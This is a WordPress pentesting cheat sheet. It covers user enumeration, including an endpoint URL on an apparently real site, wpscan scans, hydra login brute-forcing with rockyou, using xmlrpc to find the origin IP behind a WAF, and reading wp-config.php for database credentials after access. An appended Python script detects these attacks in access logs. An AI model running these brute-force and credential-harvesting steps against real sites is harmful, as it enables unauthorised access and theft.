### Find Usernames

- <https://www.wooda.co.uk/wp-json/wp/v2/users>
- `/wp-sitemap-users-1.xml`

### Basic [[wpscan]]

```bash
wpscan --url http://$IP:$PORT -e vt,tt,u,ap
```

### Bruteforce

xmlrpc.php, if enabled, might also get you the origin IP behind a WAF. Use Collaborator for the callback.

https://www.target.com/xmlrpc.php

```bash
# wpscan - DO NOT ONLY RELY ON WPSCAN, USE HYDRA
wpscan --url http://$IP:$PORT --passwords $wordlist
wpscan --url http://$IP:$PORT -U $userlist --passwords $wordlist

# hydra - http-post-form
hydra -l admin -P /usr/share/wordlists/rockyou.txt $IP https-post-form '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:S=Location' -V -e nsr -f -t 50
```

### Check `/var/www/html/wordpress/wp-config.php` after getting initial access

There are often DB creds in there.

### Proxychains

```bash
proxychains -q wpscan --url http://$IP:$PORT -e vt,tt,u,ap
```
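As an added defender-side example (not part of this cheat sheet), the enumeration and brute-force traffic described above leaves a clear trace in the web server access log. This Python script flags source IPs that burst POSTs at `/wp-login.php`, records whether one of them got the 302 that the hydra `S=Location` check treats as success, and lists hits on the user-enumeration endpoints and `xmlrpc.php`; the log lines, thresholds and IPs are constructed for the example.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed sample lines in combined log format; not taken from any real server.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Oct/2023:13:55:01 +0000] "POST /wp-login.php HTTP/1.1" 200 1324 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:02 +0000] "POST /wp-login.php HTTP/1.1" 200 1324 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Oct/2023:13:55:02 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
198.51.100.4 - - [10/Oct/2023:13:56:10 +0000] "GET /wp-json/wp/v2/users?per_page=100 HTTP/1.1" 200 812 "-" "curl/8.0"
198.51.100.4 - - [10/Oct/2023:13:56:11 +0000] "POST /xmlrpc.php HTTP/1.1" 200 370 "-" "curl/8.0"
192.0.2.9 - - [10/Oct/2023:13:57:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
"""

LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})')
RECON_PATHS = {"/wp-json/wp/v2/users", "/wp-sitemap-users-1.xml", "/xmlrpc.php"}  # endpoints from the notes above


def parse(line):
    # One combined-format line -> dict, or None when the line does not match.
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%d/%b/%Y:%H:%M:%S %z")
    rec["path"] = rec["path"].split("?", 1)[0]  # drop the query string
    return rec


def analyse(log_text, threshold=3, window_s=60):
    # brute: IP -> True if, among >= threshold POSTs to /wp-login.php within window_s
    # seconds, one got a 302 (the redirect hydra's S=Location treats as a valid login).
    # recon: IP -> sorted list of enumeration/xmlrpc paths it touched.
    posts, recon = defaultdict(list), defaultdict(set)
    for line in log_text.splitlines():
        rec = parse(line)
        if rec is None:
            continue
        if rec["method"] == "POST" and rec["path"] == "/wp-login.php":
            posts[rec["ip"]].append((rec["ts"], rec["status"]))
        if rec["path"] in RECON_PATHS:
            recon[rec["ip"]].add(rec["path"])
    brute = {}
    for ip, hits in posts.items():
        hits.sort()
        start = 0
        for end in range(len(hits)):  # sliding window over sorted timestamps
            while (hits[end][0] - hits[start][0]).total_seconds() > window_s:
                start += 1
            if end - start + 1 >= threshold:
                brute[ip] = any(status == "302" for _, status in hits)
                break
    return brute, {ip: sorted(paths) for ip, paths in recon.items()}
```

A single 302 from an IP that never bursts (192.0.2.9 in the sample) is a normal login and is not flagged; tune `threshold` and `window_s` to the site's real login rate.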